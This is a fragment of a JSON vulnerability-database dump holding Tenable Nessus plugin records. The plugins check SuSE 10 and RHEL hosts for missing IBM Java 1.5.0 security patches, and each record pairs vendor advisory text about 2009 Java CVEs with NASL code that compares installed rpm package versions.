"CVE-2009-3877", "CVE-2009-3868"], "modified": "2010-10-11T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_JAVA-1_5_0-IBM-6741.NASL", "href": "https://www.tenable.com/plugins/nessus/49863", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(49863);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-2493\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n\n script_name(english:\"SuSE 10 Security Update : IBM Java 1.5.0 (ZYPP Patch Number 6741)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"IBM Java 5 was updated to Service Refresh 11. It fixes lots of bugs\nand security issues.\n\nThe timezone update to 1.6.9s (with the latest Fiji change).\n\n - A vulnerability in the Java Runtime Environment with\n decoding DER encoded data might allow a remote client to\n cause the JRE to crash, resulting in a denial of service\n condition. (CVE-2009-3876 / CVE-2009-3877)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with parsing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3868)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with reading JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3872)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3873)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\n\n - The Java Runtime Environment includes the Java Web Start\n technology that uses the Java Web Start ActiveX control\n to launch Java Web Start in Internet Explorer. A\n security vulnerability in the Active Template Library\n (ATL) in various releases of Microsoft Visual Studio,\n which is used by the Java Web Start ActiveX control,\n might allow the Java Web Start ActiveX control to be\n leveraged to run arbitrary code. This might occur as the\n result of a user of the Java Runtime Environment viewing\n a specially crafted web page that exploits this\n vulnerability. (CVE-2009-2493)\n\nPlease also see http://www.ibm.com/developerworks/java/jdk/alerts/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-2493.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3867.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3868.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3869.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3871.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3872.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3873.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3874.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3875.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3876.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3877.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6741.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 264, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"java-1_5_0-ibm-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"java-1_5_0-ibm-demo-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"java-1_5_0-ibm-devel-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"java-1_5_0-ibm-fonts-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, reference:\"java-1_5_0-ibm-src-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"i586\", reference:\"java-1_5_0-ibm-jdbc-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"i586\", reference:\"java-1_5_0-ibm-plugin-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-32bit-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-alsa-32bit-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:3, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-devel-32bit-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"java-1_5_0-ibm-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"java-1_5_0-ibm-devel-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"java-1_5_0-ibm-fonts-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"i586\", reference:\"java-1_5_0-ibm-jdbc-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"i586\", reference:\"java-1_5_0-ibm-plugin-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-32bit-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-alsa-32bit-1.5.0_sr11-0.4.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-devel-32bit-1.5.0_sr11-0.4.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:44:37", "description": "IBM Java 5 was updated to Service Refresh 11. It fixes lots of bugs\nand security issues.\n\nThe timezone update to 1.6.9s (with the latest Fiji change).\n\n - A vulnerability in the Java Runtime Environment with\n decoding DER encoded data might allow a remote client to\n cause the JRE to crash, resulting in a denial of service\n condition. (CVE-2009-3876 / CVE-2009-3877)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with parsing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3868)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with reading JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3872)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3873)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\n\n - The Java Runtime Environment includes the Java Web Start\n technology that uses the Java Web Start ActiveX control\n to launch Java Web Start in Internet Explorer. A\n security vulnerability in the Active Template Library\n (ATL) in various releases of Microsoft Visual Studio,\n which is used by the Java Web Start ActiveX control,\n might allow the Java Web Start ActiveX control to be\n leveraged to run arbitrary code. This might occur as the\n result of a user of the Java Runtime Environment viewing\n a specially crafted web page that exploits this\n vulnerability. (CVE-2009-2493)\n\nPlease also see http://www.ibm.com/developerworks/java/jdk/alerts/", "edition": 24, "published": "2010-01-08T00:00:00", "title": "SuSE 10 Security Update : IBM Java 1.5.0 (ZYPP Patch Number 6740)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2493", "CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "modified": "2010-01-08T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_JAVA-1_5_0-IBM-6740.NASL", "href": "https://www.tenable.com/plugins/nessus/43822", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43822);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-2493\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n\n script_name(english:\"SuSE 10 Security Update : IBM Java 1.5.0 (ZYPP Patch Number 6740)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"IBM Java 5 was updated to Service Refresh 11. It fixes lots of bugs\nand security issues.\n\nThe timezone update to 1.6.9s (with the latest Fiji change).\n\n - A vulnerability in the Java Runtime Environment with\n decoding DER encoded data might allow a remote client to\n cause the JRE to crash, resulting in a denial of service\n condition. (CVE-2009-3876 / CVE-2009-3877)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment audio system might allow an untrusted applet\n or Java Web Start application to escalate privileges.\n For example, an untrusted applet might grant itself\n permissions to read and write local files, or run local\n applications that are accessible to the user running the\n untrusted applet. (CVE-2009-3867)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with parsing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3868)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with reading JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3872)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing JPEG files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files, or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3873)\n\n - A security vulnerability in the Java Runtime Environment\n with verifying HMAC digests might allow authentication\n to be bypassed. This action can allow a user to forge a\n digital signature that would be accepted as valid.\n Applications that validate HMAC-based digital signatures\n might be vulnerable to this type of attack.\n (CVE-2009-3875)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3869)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing image files might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3871)\n\n - An integer overflow vulnerability in the Java Runtime\n Environment with processing JPEG images might allow an\n untrusted applet or Java Web Start application to\n escalate privileges. For example, an untrusted applet\n might grant itself permissions to read and write local\n files or run local applications that are accessible to\n the user running the untrusted applet. (CVE-2009-3874)\n\n - The Java Runtime Environment includes the Java Web Start\n technology that uses the Java Web Start ActiveX control\n to launch Java Web Start in Internet Explorer. A\n security vulnerability in the Active Template Library\n (ATL) in various releases of Microsoft Visual Studio,\n which is used by the Java Web Start ActiveX control,\n might allow the Java Web Start ActiveX control to be\n leveraged to run arbitrary code. This might occur as the\n result of a user of the Java Runtime Environment viewing\n a specially crafted web page that exploits this\n vulnerability. (CVE-2009-2493)\n\nPlease also see http://www.ibm.com/developerworks/java/jdk/alerts/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-2493.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3867.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3868.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3869.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3871.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3872.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3873.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3874.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3875.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3876.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3877.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6740.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119, 189, 264, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-demo-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-devel-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-fonts-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"java-1_5_0-ibm-src-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-alsa-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-jdbc-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-plugin-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-32bit-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-alsa-32bit-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-devel-32bit-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"java-1_5_0-ibm-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"java-1_5_0-ibm-devel-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"java-1_5_0-ibm-fonts-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-alsa-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-jdbc-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"i586\", reference:\"java-1_5_0-ibm-plugin-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-32bit-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-alsa-32bit-1.5.0_sr11-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"java-1_5_0-ibm-devel-32bit-1.5.0_sr11-0.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:07:17", "description": "Updated java-1.5.0-ibm packages that fix several security issues are\nnow available for Red Hat Enterprise Linux 4 Extras and 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM 'Security alerts' page\nlisted in the References section. (CVE-2009-3867, CVE-2009-3868,\nCVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873,\nCVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR11 Java release. All running\ninstances of IBM Java must be restarted for this update to take\neffect.", "edition": 29, "published": "2009-12-09T00:00:00", "title": "RHEL 4 / 5 : java-1.5.0-ibm (RHSA-2009:1647)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2010-0079", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "modified": "2009-12-09T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm", "cpe:/o:redhat:enterprise_linux:4.8", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-javacomm", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-devel", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-accessibility", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-demo", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-src", "cpe:/o:redhat:enterprise_linux:5.4", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-jdbc", "p-cpe:/a:redhat:enterprise_linux:java-1.5.0-ibm-plugin"], "id": "REDHAT-RHSA-2009-1647.NASL", "href": "https://www.tenable.com/plugins/nessus/43079", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1647. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43079);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\", \"CVE-2010-0079\");\n script_bugtraq_id(36881);\n script_xref(name:\"RHSA\", value:\"2009:1647\");\n\n script_name(english:\"RHEL 4 / 5 : java-1.5.0-ibm (RHSA-2009:1647)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.5.0-ibm packages that fix several security issues are\nnow available for Red Hat Enterprise Linux 4 Extras and 5\nSupplementary.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nThe IBM 1.5.0 Java release includes the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM 'Security alerts' page\nlisted in the References section. (CVE-2009-3867, CVE-2009-3868,\nCVE-2009-3869, CVE-2009-3871, CVE-2009-3872, CVE-2009-3873,\nCVE-2009-3874, CVE-2009-3875, CVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.5.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.5.0 SR11 Java release. All running\ninstances of IBM Java must be restarted for this update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3867\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3868\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3869\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3871\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3872\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-3873\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 